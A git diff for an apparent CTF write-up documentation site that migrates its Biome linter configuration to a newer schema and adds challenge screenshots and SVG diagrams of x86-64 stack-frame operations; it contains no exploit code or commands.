diff --git a/.vitepress/biome.json b/.vitepress/biome.json index 12e778e..2524863 100644 --- a/.vitepress/biome.json +++ b/.vitepress/biome.json @@ -1,3 +1,4 @@ { + "root": false, "extends": ["../biome.json"] } diff --git a/biome.json b/biome.json index 62baa54..39a084b 100644 --- a/biome.json +++ b/biome.json @@ -1,5 +1,5 @@ { - "$schema": "https://biomejs.dev/schemas/1.9.4/schema.json", + "$schema": "https://biomejs.dev/schemas/2.5.2/schema.json", "formatter": { "enabled": true, "formatWithErrors": false, @@ -10,31 +10,33 @@ "attributePosition": "auto" }, "files": { - "include": ["**/*.ts", "**/*.tsx", "**/*.js", "**/*.jsx", "**/*.json"], - "ignore": [ - "**/.git", - "**/.github", - "**/.DS_Store", - "**/.vscode", - "**/.idea", - "**/.cache", - "**/node_modules", - "./build", - "**/dist", - "**/.env", - "**/.env.*", - "**/pnpm-lock.yaml", - "**/package-lock.json", - "**/yarn.lock" + "includes": [ + "**/*.ts", + "**/*.tsx", + "**/*.js", + "**/*.jsx", + "**/*.json", + "!**/.git", + "!**/.github", + "!**/.DS_Store", + "!**/.vscode", + "!**/.idea", + "!**/.cache", + "!**/node_modules", + "!build", + "!**/dist", + "!**/.env", + "!**/.env.*", + "!**/pnpm-lock.yaml", + "!**/package-lock.json", + "!**/yarn.lock" ] }, - "organizeImports": { - "enabled": true - }, + "assist": { "actions": { "source": { "organizeImports": "on" } } }, "linter": { "enabled": true, "rules": { - "recommended": true, + "preset": "recommended", "style": { "noNonNullAssertion": "off" }, @@ -46,13 +48,13 @@ "noUnusedImports": "error", "noConstAssign": "error", "noUnreachable": "error", - "noUnnecessaryContinue": "warn", "noUnsafeFinally": "error", "noUnusedLabels": "error", "noUnusedPrivateClassMembers": "error", "noUnusedVariables": "warn", "noUndeclaredVariables": "error" - } + }, + "complexity": { "noUselessContinue": "warn" } } }, "javascript": { diff --git a/docs/assets/images/wp/2025/extras/not-all-milk_1.png b/docs/assets/images/wp/2025/extras/not-all-milk_1.png new file mode 100644 index 0000000..b97c3aa Binary files /dev/null and b/docs/assets/images/wp/2025/extras/not-all-milk_1.png differ diff --git a/docs/assets/images/wp/2025/extras/not-all-milk_10.png b/docs/assets/images/wp/2025/extras/not-all-milk_10.png new file mode 100644 index 0000000..3ea42aa Binary files /dev/null and b/docs/assets/images/wp/2025/extras/not-all-milk_10.png differ diff --git a/docs/assets/images/wp/2025/extras/not-all-milk_11.png b/docs/assets/images/wp/2025/extras/not-all-milk_11.png new file mode 100644 index 0000000..9d561a5 Binary files /dev/null and b/docs/assets/images/wp/2025/extras/not-all-milk_11.png differ diff --git a/docs/assets/images/wp/2025/extras/not-all-milk_2.png b/docs/assets/images/wp/2025/extras/not-all-milk_2.png new file mode 100644 index 0000000..2a1026f Binary files /dev/null and b/docs/assets/images/wp/2025/extras/not-all-milk_2.png differ diff --git a/docs/assets/images/wp/2025/extras/not-all-milk_3.png b/docs/assets/images/wp/2025/extras/not-all-milk_3.png new file mode 100644 index 0000000..4533d13 Binary files /dev/null and b/docs/assets/images/wp/2025/extras/not-all-milk_3.png differ diff --git a/docs/assets/images/wp/2025/extras/not-all-milk_4.png b/docs/assets/images/wp/2025/extras/not-all-milk_4.png new file mode 100644 index 0000000..800402b Binary files /dev/null and b/docs/assets/images/wp/2025/extras/not-all-milk_4.png differ diff --git a/docs/assets/images/wp/2025/extras/not-all-milk_5.png b/docs/assets/images/wp/2025/extras/not-all-milk_5.png new file mode 100644 index 0000000..f58aad9 Binary files /dev/null and b/docs/assets/images/wp/2025/extras/not-all-milk_5.png differ diff --git a/docs/assets/images/wp/2025/extras/not-all-milk_6.png b/docs/assets/images/wp/2025/extras/not-all-milk_6.png new file mode 100644 index 0000000..b2ad8b4 Binary files /dev/null and b/docs/assets/images/wp/2025/extras/not-all-milk_6.png differ diff --git a/docs/assets/images/wp/2025/extras/not-all-milk_7.png b/docs/assets/images/wp/2025/extras/not-all-milk_7.png new file mode 100644 index 0000000..70ad38f Binary files /dev/null and b/docs/assets/images/wp/2025/extras/not-all-milk_7.png differ diff --git a/docs/assets/images/wp/2025/extras/not-all-milk_8.png b/docs/assets/images/wp/2025/extras/not-all-milk_8.png new file mode 100644 index 0000000..ef5c43c Binary files /dev/null and b/docs/assets/images/wp/2025/extras/not-all-milk_8.png differ diff --git a/docs/assets/images/wp/2025/extras/not-all-milk_9.png b/docs/assets/images/wp/2025/extras/not-all-milk_9.png new file mode 100644 index 0000000..1972814 Binary files /dev/null and b/docs/assets/images/wp/2025/extras/not-all-milk_9.png differ diff --git a/docs/assets/images/wp/2025/stack_callee.svg b/docs/assets/images/wp/2025/stack_callee.svg new file mode 100644 index 0000000..ffa453b --- /dev/null +++ b/docs/assets/images/wp/2025/stack_callee.svg @@ -0,0 +1,2 @@ + +argreturn addrprevious rbpargm...arg1return addrprevious rbpargn...arg2arg1rsp调用者的基地址返回的指令地址Low addressrbp diff --git a/docs/assets/images/wp/2025/stack_caller.svg b/docs/assets/images/wp/2025/stack_caller.svg new file mode 100644 index 0000000..4238dcf --- /dev/null +++ b/docs/assets/images/wp/2025/stack_caller.svg @@ -0,0 +1,2 @@ + +argreturn addrprevious rbpargm...arg1rsprbp调用者的基地址返回的指令地址Low address diff --git a/docs/assets/images/wp/2025/stack_func-start_mov_rbp_rsp.svg b/docs/assets/images/wp/2025/stack_func-start_mov_rbp_rsp.svg new file mode 100644 index 0000000..4aa8aee --- /dev/null +++ b/docs/assets/images/wp/2025/stack_func-start_mov_rbp_rsp.svg @@ -0,0 +1,2 @@ + +argreturn addrprevious rbpargm...arg1return addrprevious rbp调用者的基地址返回的指令地址Low addressmov rbp, rsprspLow addressrbpargreturn addrprevious rbpargm...arg1return addrprevious rbp调用者的基地址返回的指令地址rsp, rbp diff --git a/docs/assets/images/wp/2025/stack_func-start_push_rbp.svg b/docs/assets/images/wp/2025/stack_func-start_push_rbp.svg new file mode 100644 index 0000000..1547ed7 --- /dev/null +++ b/docs/assets/images/wp/2025/stack_func-start_push_rbp.svg @@ -0,0 +1,2 @@ + +argreturnaddrpreviousrbpargm...arg1rsprbpargreturnaddrpreviousrbpargm...arg1returnaddrpreviousrbp调用者的基地址返回的指令地址rsppush rbprbpLow addressLow address diff --git a/docs/assets/images/wp/2025/stack_leave_mov_rsp_rbp.svg b/docs/assets/images/wp/2025/stack_leave_mov_rsp_rbp.svg new file mode 100644 index 0000000..0f278a2 --- /dev/null +++ b/docs/assets/images/wp/2025/stack_leave_mov_rsp_rbp.svg @@ -0,0 +1,2 @@ + +argreturn addrprevious rbpargm...arg1return addrprevious rbpargn...arg2arg1rsp调用者的基地址返回的指令地址Low addressrbpargreturn addrprevious rbpargm...arg1Low addressreturn addrprevious rbp调用者的基地址返回的指令地址rsp, rbpmov rsp, rbpargn...arg2arg1 diff --git a/docs/assets/images/wp/2025/stack_leave_pop_rbp.svg b/docs/assets/images/wp/2025/stack_leave_pop_rbp.svg new file mode 100644 index 0000000..e380e87 --- /dev/null +++ b/docs/assets/images/wp/2025/stack_leave_pop_rbp.svg @@ -0,0 +1,2 @@ + +argreturn addrprevious rbpargm...arg1return addrprevious rbp调用者的基地址返回的指令地址Low addressargreturn addrprevious rbpargm...arg1return addr返回的指令地址pop rbprsp, rbpLow addressrsprbp diff --git a/docs/assets/images/wp/2025/stack_pop.svg b/docs/assets/images/wp/2025/stack_pop.svg new file mode 100644 index 0000000..7f21e49 --- /dev/null +++ b/docs/assets/images/wp/2025/stack_pop.svg @@ -0,0 +1,2 @@ + +return addrprevious rbpargn...arg1foorbpreturn addrprevious rbpargn...arg1fooLow addressrbppoprspbarrsp diff --git a/docs/assets/images/wp/2025/stack_push.svg b/docs/assets/images/wp/2025/stack_push.svg new file mode 100644 index 0000000..4ed8592 --- /dev/null +++ b/docs/assets/images/wp/2025/stack_push.svg @@ -0,0 +1,2 @@ + +return addrprevious rbpargn...arg1foorsprbpreturn addrprevious rbpargn...arg1foorspLow addressrbpbarpush bar diff --git a/docs/assets/images/wp/2025/stack_ret_pop_rip.svg b/docs/assets/images/wp/2025/stack_ret_pop_rip.svg new file mode 100644 index 0000000..7047367 --- /dev/null +++ b/docs/assets/images/wp/2025/stack_ret_pop_rip.svg @@ -0,0 +1,2 @@ + +argreturnaddrpreviousrbpargm...arg10x0d000721返回的指令地址Low addressargreturnaddrpreviousrbpargm...arg1pop ripLow addressrsprbp0x0d000721rip0x0d000930riprsprbp diff --git a/docs/assets/images/wp/2025/week1/black-w-1_1.png b/docs/assets/images/wp/2025/week1/black-w-1_1.png new file mode 100644 index 0000000..0e41e89 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/black-w-1_1.png differ diff --git a/docs/assets/images/wp/2025/week1/black-w-1_10.png b/docs/assets/images/wp/2025/week1/black-w-1_10.png new file mode 100644 index 0000000..f4756c8 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/black-w-1_10.png differ diff --git a/docs/assets/images/wp/2025/week1/black-w-1_11.png b/docs/assets/images/wp/2025/week1/black-w-1_11.png new file mode 100644 index 0000000..c9530ff Binary files /dev/null and b/docs/assets/images/wp/2025/week1/black-w-1_11.png differ diff --git a/docs/assets/images/wp/2025/week1/black-w-1_12.png b/docs/assets/images/wp/2025/week1/black-w-1_12.png new file mode 100644 index 0000000..b788b28 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/black-w-1_12.png differ diff --git a/docs/assets/images/wp/2025/week1/black-w-1_2.png b/docs/assets/images/wp/2025/week1/black-w-1_2.png new file mode 100644 index 0000000..fed7a1c Binary files /dev/null and b/docs/assets/images/wp/2025/week1/black-w-1_2.png differ diff --git a/docs/assets/images/wp/2025/week1/black-w-1_3.png b/docs/assets/images/wp/2025/week1/black-w-1_3.png new file mode 100644 index 0000000..90b4f4c Binary files /dev/null and b/docs/assets/images/wp/2025/week1/black-w-1_3.png differ diff --git a/docs/assets/images/wp/2025/week1/black-w-1_4.png b/docs/assets/images/wp/2025/week1/black-w-1_4.png new file mode 100644 index 0000000..fa8b4eb Binary files /dev/null and b/docs/assets/images/wp/2025/week1/black-w-1_4.png differ diff --git a/docs/assets/images/wp/2025/week1/black-w-1_5.png b/docs/assets/images/wp/2025/week1/black-w-1_5.png new file mode 100644 index 0000000..0020f4f Binary files /dev/null and b/docs/assets/images/wp/2025/week1/black-w-1_5.png differ diff --git a/docs/assets/images/wp/2025/week1/black-w-1_6.png b/docs/assets/images/wp/2025/week1/black-w-1_6.png new file mode 100644 index 0000000..7e46c7b Binary files /dev/null and b/docs/assets/images/wp/2025/week1/black-w-1_6.png differ diff --git a/docs/assets/images/wp/2025/week1/black-w-1_7.png b/docs/assets/images/wp/2025/week1/black-w-1_7.png new file mode 100644 index 0000000..1adb8dd Binary files /dev/null and b/docs/assets/images/wp/2025/week1/black-w-1_7.png differ diff --git a/docs/assets/images/wp/2025/week1/black-w-1_8.png b/docs/assets/images/wp/2025/week1/black-w-1_8.png new file mode 100644 index 0000000..8306bbe Binary files /dev/null and b/docs/assets/images/wp/2025/week1/black-w-1_8.png differ diff --git a/docs/assets/images/wp/2025/week1/black-w-1_9.png b/docs/assets/images/wp/2025/week1/black-w-1_9.png new file mode 100644 index 0000000..1f47885 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/black-w-1_9.png differ diff --git a/docs/assets/images/wp/2025/week1/center-php_1.png b/docs/assets/images/wp/2025/week1/center-php_1.png new file mode 100644 index 0000000..27a1f07 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/center-php_1.png differ diff --git a/docs/assets/images/wp/2025/week1/center-php_2.png b/docs/assets/images/wp/2025/week1/center-php_2.png new file mode 100644 index 0000000..9bdc445 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/center-php_2.png differ diff --git a/docs/assets/images/wp/2025/week1/compression-magic_1.png b/docs/assets/images/wp/2025/week1/compression-magic_1.png new file mode 100644 index 0000000..bc8b5a1 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/compression-magic_1.png differ diff --git a/docs/assets/images/wp/2025/week1/compression-magic_2.png b/docs/assets/images/wp/2025/week1/compression-magic_2.png new file mode 100644 index 0000000..c5c6c41 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/compression-magic_2.png differ diff --git a/docs/assets/images/wp/2025/week1/compression-magic_3.png b/docs/assets/images/wp/2025/week1/compression-magic_3.png new file mode 100644 index 0000000..05ff326 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/compression-magic_3.png differ diff --git a/docs/assets/images/wp/2025/week1/compression-magic_4.png b/docs/assets/images/wp/2025/week1/compression-magic_4.png new file mode 100644 index 0000000..d37cb25 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/compression-magic_4.png differ diff --git a/docs/assets/images/wp/2025/week1/compression-magic_5.png b/docs/assets/images/wp/2025/week1/compression-magic_5.png new file mode 100644 index 0000000..31968de Binary files /dev/null and b/docs/assets/images/wp/2025/week1/compression-magic_5.png differ diff --git a/docs/assets/images/wp/2025/week1/compression-magic_6.png b/docs/assets/images/wp/2025/week1/compression-magic_6.png new file mode 100644 index 0000000..5d89cc1 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/compression-magic_6.png differ diff --git a/docs/assets/images/wp/2025/week1/compression-magic_7.png b/docs/assets/images/wp/2025/week1/compression-magic_7.png new file mode 100644 index 0000000..7b7fd8b Binary files /dev/null and b/docs/assets/images/wp/2025/week1/compression-magic_7.png differ diff --git a/docs/assets/images/wp/2025/week1/control-you_1.png b/docs/assets/images/wp/2025/week1/control-you_1.png new file mode 100644 index 0000000..97dc77e Binary files /dev/null and b/docs/assets/images/wp/2025/week1/control-you_1.png differ diff --git a/docs/assets/images/wp/2025/week1/control-you_2.png b/docs/assets/images/wp/2025/week1/control-you_2.png new file mode 100644 index 0000000..f81391c Binary files /dev/null and b/docs/assets/images/wp/2025/week1/control-you_2.png differ diff --git a/docs/assets/images/wp/2025/week1/ez-fence_1.png b/docs/assets/images/wp/2025/week1/ez-fence_1.png new file mode 100644 index 0000000..a1420a5 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/ez-fence_1.png differ diff --git a/docs/assets/images/wp/2025/week1/ez-fence_2.png b/docs/assets/images/wp/2025/week1/ez-fence_2.png new file mode 100644 index 0000000..c4bd768 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/ez-fence_2.png differ diff --git a/docs/assets/images/wp/2025/week1/ezmydroid_1.png b/docs/assets/images/wp/2025/week1/ezmydroid_1.png new file mode 100644 index 0000000..5ca3206 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/ezmydroid_1.png differ diff --git a/docs/assets/images/wp/2025/week1/ezmydroid_2.png b/docs/assets/images/wp/2025/week1/ezmydroid_2.png new file mode 100644 index 0000000..828f268 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/ezmydroid_2.png differ diff --git a/docs/assets/images/wp/2025/week1/gnu-debugger_1.png b/docs/assets/images/wp/2025/week1/gnu-debugger_1.png new file mode 100644 index 0000000..71a558f Binary files /dev/null and b/docs/assets/images/wp/2025/week1/gnu-debugger_1.png differ diff --git a/docs/assets/images/wp/2025/week1/gnu-debugger_2.png b/docs/assets/images/wp/2025/week1/gnu-debugger_2.png new file mode 100644 index 0000000..2dccf07 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/gnu-debugger_2.png differ diff --git a/docs/assets/images/wp/2025/week1/gnu-debugger_3.png b/docs/assets/images/wp/2025/week1/gnu-debugger_3.png new file mode 100644 index 0000000..2af1b60 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/gnu-debugger_3.png differ diff --git a/docs/assets/images/wp/2025/week1/input-function_1.png b/docs/assets/images/wp/2025/week1/input-function_1.png new file mode 100644 index 0000000..3ea6ca9 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/input-function_1.png differ diff --git a/docs/assets/images/wp/2025/week1/input-function_2.jpg b/docs/assets/images/wp/2025/week1/input-function_2.jpg new file mode 100644 index 0000000..8caaef1 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/input-function_2.jpg differ diff --git a/docs/assets/images/wp/2025/week1/input-function_3.png b/docs/assets/images/wp/2025/week1/input-function_3.png new file mode 100644 index 0000000..0418859 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/input-function_3.png differ diff --git a/docs/assets/images/wp/2025/week1/intbug_1.png b/docs/assets/images/wp/2025/week1/intbug_1.png new file mode 100644 index 0000000..2b0b53f Binary files /dev/null and b/docs/assets/images/wp/2025/week1/intbug_1.png differ diff --git a/docs/assets/images/wp/2025/week1/intbug_2.png b/docs/assets/images/wp/2025/week1/intbug_2.png new file mode 100644 index 0000000..e2904e3 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/intbug_2.png differ diff --git a/docs/assets/images/wp/2025/week1/no-revolution-fail_1.png b/docs/assets/images/wp/2025/week1/no-revolution-fail_1.png new file mode 100644 index 0000000..134404f Binary files /dev/null and b/docs/assets/images/wp/2025/week1/no-revolution-fail_1.png differ diff --git a/docs/assets/images/wp/2025/week1/no-revolution-fail_2.png b/docs/assets/images/wp/2025/week1/no-revolution-fail_2.png new file mode 100644 index 0000000..e344d08 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/no-revolution-fail_2.png differ diff --git a/docs/assets/images/wp/2025/week1/no-revolution-fail_3.png b/docs/assets/images/wp/2025/week1/no-revolution-fail_3.png new file mode 100644 index 0000000..3c8e423 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/no-revolution-fail_3.png differ diff --git a/docs/assets/images/wp/2025/week1/no-revolution-fail_4.png b/docs/assets/images/wp/2025/week1/no-revolution-fail_4.png new file mode 100644 index 0000000..1c94020 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/no-revolution-fail_4.png differ diff --git a/docs/assets/images/wp/2025/week1/osint-sky-belong_1.png b/docs/assets/images/wp/2025/week1/osint-sky-belong_1.png new file mode 100644 index 0000000..8623882 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/osint-sky-belong_1.png differ diff --git a/docs/assets/images/wp/2025/week1/osint-sky-belong_2.png b/docs/assets/images/wp/2025/week1/osint-sky-belong_2.png new file mode 100644 index 0000000..a405054 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/osint-sky-belong_2.png differ diff --git a/docs/assets/images/wp/2025/week1/osint-sky-belong_3.png b/docs/assets/images/wp/2025/week1/osint-sky-belong_3.png new file mode 100644 index 0000000..46a48bc Binary files /dev/null and b/docs/assets/images/wp/2025/week1/osint-sky-belong_3.png differ diff --git a/docs/assets/images/wp/2025/week1/osint-sky-belong_4.png b/docs/assets/images/wp/2025/week1/osint-sky-belong_4.png new file mode 100644 index 0000000..8115818 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/osint-sky-belong_4.png differ diff --git a/docs/assets/images/wp/2025/week1/osint-sky-belong_5.png b/docs/assets/images/wp/2025/week1/osint-sky-belong_5.png new file mode 100644 index 0000000..697e186 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/osint-sky-belong_5.png differ diff --git a/docs/assets/images/wp/2025/week1/overflow_1.png b/docs/assets/images/wp/2025/week1/overflow_1.png new file mode 100644 index 0000000..13b6bc6 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/overflow_1.png differ diff --git a/docs/assets/images/wp/2025/week1/overflow_2.png b/docs/assets/images/wp/2025/week1/overflow_2.png new file mode 100644 index 0000000..1dbf36e Binary files /dev/null and b/docs/assets/images/wp/2025/week1/overflow_2.png differ diff --git a/docs/assets/images/wp/2025/week1/overflow_3.png b/docs/assets/images/wp/2025/week1/overflow_3.png new file mode 100644 index 0000000..61c5b00 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/overflow_3.png differ diff --git a/docs/assets/images/wp/2025/week1/overflow_4.png b/docs/assets/images/wp/2025/week1/overflow_4.png new file mode 100644 index 0000000..f2bc532 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/overflow_4.png differ diff --git a/docs/assets/images/wp/2025/week1/overflow_5.png b/docs/assets/images/wp/2025/week1/overflow_5.png new file mode 100644 index 0000000..9392f35 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/overflow_5.png differ diff --git a/docs/assets/images/wp/2025/week1/overflow_6.png b/docs/assets/images/wp/2025/week1/overflow_6.png new file mode 100644 index 0000000..c19b0e4 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/overflow_6.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_1.png b/docs/assets/images/wp/2025/week1/plzdebugme_1.png new file mode 100644 index 0000000..cab7018 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_1.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_10.png b/docs/assets/images/wp/2025/week1/plzdebugme_10.png new file mode 100644 index 0000000..4189520 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_10.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_11.png b/docs/assets/images/wp/2025/week1/plzdebugme_11.png new file mode 100644 index 0000000..6fa2cfc Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_11.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_12.png b/docs/assets/images/wp/2025/week1/plzdebugme_12.png new file mode 100644 index 0000000..7cf69de Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_12.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_13.png b/docs/assets/images/wp/2025/week1/plzdebugme_13.png new file mode 100644 index 0000000..e3b286e Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_13.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_14.png b/docs/assets/images/wp/2025/week1/plzdebugme_14.png new file mode 100644 index 0000000..64ae162 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_14.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_15.png b/docs/assets/images/wp/2025/week1/plzdebugme_15.png new file mode 100644 index 0000000..ebccb45 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_15.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_2.png b/docs/assets/images/wp/2025/week1/plzdebugme_2.png new file mode 100644 index 0000000..18b9566 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_2.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_3.png b/docs/assets/images/wp/2025/week1/plzdebugme_3.png new file mode 100644 index 0000000..fd0f2e3 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_3.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_4.png b/docs/assets/images/wp/2025/week1/plzdebugme_4.png new file mode 100644 index 0000000..279f781 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_4.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_5.png b/docs/assets/images/wp/2025/week1/plzdebugme_5.png new file mode 100644 index 0000000..58cc341 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_5.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_6.png b/docs/assets/images/wp/2025/week1/plzdebugme_6.png new file mode 100644 index 0000000..0522e83 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_6.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_7.png b/docs/assets/images/wp/2025/week1/plzdebugme_7.png new file mode 100644 index 0000000..72811ab Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_7.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_8.png b/docs/assets/images/wp/2025/week1/plzdebugme_8.png new file mode 100644 index 0000000..76cd6f8 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_8.png differ diff --git a/docs/assets/images/wp/2025/week1/plzdebugme_9.png b/docs/assets/images/wp/2025/week1/plzdebugme_9.png new file mode 100644 index 0000000..0717ec1 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/plzdebugme_9.png differ diff --git a/docs/assets/images/wp/2025/week1/puzzle_1.png b/docs/assets/images/wp/2025/week1/puzzle_1.png new file mode 100644 index 0000000..455e0d2 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/puzzle_1.png differ diff --git a/docs/assets/images/wp/2025/week1/puzzle_2.png b/docs/assets/images/wp/2025/week1/puzzle_2.png new file mode 100644 index 0000000..297e444 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/puzzle_2.png differ diff --git a/docs/assets/images/wp/2025/week1/puzzle_3.png b/docs/assets/images/wp/2025/week1/puzzle_3.png new file mode 100644 index 0000000..87d0c62 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/puzzle_3.png differ diff --git a/docs/assets/images/wp/2025/week1/puzzle_4.png b/docs/assets/images/wp/2025/week1/puzzle_4.png new file mode 100644 index 0000000..998669f Binary files /dev/null and b/docs/assets/images/wp/2025/week1/puzzle_4.png differ diff --git a/docs/assets/images/wp/2025/week1/puzzle_5.png b/docs/assets/images/wp/2025/week1/puzzle_5.png new file mode 100644 index 0000000..d5ac9f1 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/puzzle_5.png differ diff --git a/docs/assets/images/wp/2025/week1/pwn-door_1.png b/docs/assets/images/wp/2025/week1/pwn-door_1.png new file mode 100644 index 0000000..71a558f Binary files /dev/null and b/docs/assets/images/wp/2025/week1/pwn-door_1.png differ diff --git a/docs/assets/images/wp/2025/week1/pwn-door_2.png b/docs/assets/images/wp/2025/week1/pwn-door_2.png new file mode 100644 index 0000000..6d34c5b Binary files /dev/null and b/docs/assets/images/wp/2025/week1/pwn-door_2.png differ diff --git a/docs/assets/images/wp/2025/week1/pwn-door_3.png b/docs/assets/images/wp/2025/week1/pwn-door_3.png new file mode 100644 index 0000000..c90d33f Binary files /dev/null and b/docs/assets/images/wp/2025/week1/pwn-door_3.png differ diff --git a/docs/assets/images/wp/2025/week1/pwn-door_4.png b/docs/assets/images/wp/2025/week1/pwn-door_4.png new file mode 100644 index 0000000..beb83a6 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/pwn-door_4.png differ diff --git a/docs/assets/images/wp/2025/week1/pwn-door_5.png b/docs/assets/images/wp/2025/week1/pwn-door_5.png new file mode 100644 index 0000000..ff5628a Binary files /dev/null and b/docs/assets/images/wp/2025/week1/pwn-door_5.png differ diff --git a/docs/assets/images/wp/2025/week1/strange-base_1.png b/docs/assets/images/wp/2025/week1/strange-base_1.png new file mode 100644 index 0000000..622b0bd Binary files /dev/null and b/docs/assets/images/wp/2025/week1/strange-base_1.png differ diff --git a/docs/assets/images/wp/2025/week1/strange-base_2.png b/docs/assets/images/wp/2025/week1/strange-base_2.png new file mode 100644 index 0000000..4b68572 Binary files /dev/null and b/docs/assets/images/wp/2025/week1/strange-base_2.png differ diff --git a/docs/assets/images/wp/2025/week2/beautiful-music_1.png b/docs/assets/images/wp/2025/week2/beautiful-music_1.png new file mode 100644 index 0000000..9a5db11 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/beautiful-music_1.png differ diff --git a/docs/assets/images/wp/2025/week2/dd-accelerator_1.png b/docs/assets/images/wp/2025/week2/dd-accelerator_1.png new file mode 100644 index 0000000..5e0e61f Binary files /dev/null and b/docs/assets/images/wp/2025/week2/dd-accelerator_1.png differ diff --git a/docs/assets/images/wp/2025/week2/dd-accelerator_2.png b/docs/assets/images/wp/2025/week2/dd-accelerator_2.png new file mode 100644 index 0000000..2b7541f Binary files /dev/null and b/docs/assets/images/wp/2025/week2/dd-accelerator_2.png differ diff --git a/docs/assets/images/wp/2025/week2/dd-accelerator_3.png b/docs/assets/images/wp/2025/week2/dd-accelerator_3.png new file mode 100644 index 0000000..6f63084 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/dd-accelerator_3.png differ diff --git a/docs/assets/images/wp/2025/week2/input-small-function_1.png b/docs/assets/images/wp/2025/week2/input-small-function_1.png new file mode 100644 index 0000000..718ea6b Binary files /dev/null and b/docs/assets/images/wp/2025/week2/input-small-function_1.png differ diff --git a/docs/assets/images/wp/2025/week2/input-small-function_2.png b/docs/assets/images/wp/2025/week2/input-small-function_2.png new file mode 100644 index 0000000..d619c75 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/input-small-function_2.png differ diff --git a/docs/assets/images/wp/2025/week2/input-small-function_3.png b/docs/assets/images/wp/2025/week2/input-small-function_3.png new file mode 100644 index 0000000..f4dae28 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/input-small-function_3.png differ diff --git a/docs/assets/images/wp/2025/week2/input-small-function_4.png b/docs/assets/images/wp/2025/week2/input-small-function_4.png new file mode 100644 index 0000000..e5c47b9 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/input-small-function_4.png differ diff --git a/docs/assets/images/wp/2025/week2/input-small-function_5.png b/docs/assets/images/wp/2025/week2/input-small-function_5.png new file mode 100644 index 0000000..0113577 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/input-small-function_5.png differ diff --git a/docs/assets/images/wp/2025/week2/log-intrusion_1.png b/docs/assets/images/wp/2025/week2/log-intrusion_1.png new file mode 100644 index 0000000..0833ca7 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/log-intrusion_1.png differ diff --git a/docs/assets/images/wp/2025/week2/look-carefully_1.png b/docs/assets/images/wp/2025/week2/look-carefully_1.png new file mode 100644 index 0000000..0638e47 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/look-carefully_1.png differ diff --git a/docs/assets/images/wp/2025/week2/look-carefully_2.png b/docs/assets/images/wp/2025/week2/look-carefully_2.png new file mode 100644 index 0000000..305187d Binary files /dev/null and b/docs/assets/images/wp/2025/week2/look-carefully_2.png differ diff --git a/docs/assets/images/wp/2025/week2/look-carefully_3.png 